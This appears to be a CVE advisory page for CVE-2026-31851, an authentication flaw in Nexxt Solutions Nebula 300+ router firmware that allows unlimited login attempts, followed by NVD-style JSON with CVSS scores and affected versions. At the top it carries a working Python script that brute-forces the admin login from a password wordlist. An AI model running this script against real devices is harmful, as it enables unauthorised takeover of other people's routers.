CVE-2026-31851

import requests # Target configuration target_url = "http://<target_ip>/login" username = "admin" wordlist = "passwords.txt" # Headers to mimic a browser headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } def brute_force_login(): # Open the wordlist file with open(wordlist, 'r') as f: for password in f: password = password.strip() # Payload data payload = { "username": username, "password": password } try: # Send POST request to login endpoint response = requests.post(target_url, data=payload, headers=headers, timeout=5) # Check if login was successful (adjust condition based on response) if response.status_code == 200 and "dashboard" in response.text: print(f"[+] Success! Password found: {password}") return password else: print(f"[-] Failed attempt: {password}") except requests.RequestException as e: print(f"[!] Error connecting to target: {e}") break if __name__ == "__main__": brute_force_login()

{"cve": {"id": "CVE-2026-31851", "sourceIdentifier": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "published": "2026-03-23T13:16:30.960", "lastModified": "2026-04-29T17:37:36.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nexxt Solutions Nebula 300+ firmware through version 12.01.01.37 does not implement rate limiting or account lockout mechanisms on authentication interfaces. An attacker can perform unlimited authentication attempts against endpoints that rely on credential validation, enabling brute-force attacks to guess administrative credentials without restriction."}, {"lang": "es", "value": "El firmware de Nexxt Solutions Nebula 300+ hasta la versión 12.01.01.37 no implementa limitación de tasa o bloqueo de cuenta en la interfaz de autenticación."}], "metrics": {"cvssMetricV40": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nexxtsolutions:nebula300plus_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.01.01.37", "matchCriteriaId": "D55E0FD8-9ADB-423B-A23F-64F41F9DD40B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nexxtsolutions:nebula300plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9AA93D2-E1BA-4EFC-8760-BF366CF6474D"}]}]}], "references": [{"url": "https://nexxt-connectivity-frontend.s3.amazonaws.com/media/docs/Nebula300+_v12.01.01.37.zip", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "tags": ["Product"]}, {"url": "https://www.nexxtsolutions.com/connectivity/internal-products/ARN02304U6/", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "tags": ["Product"]}]}}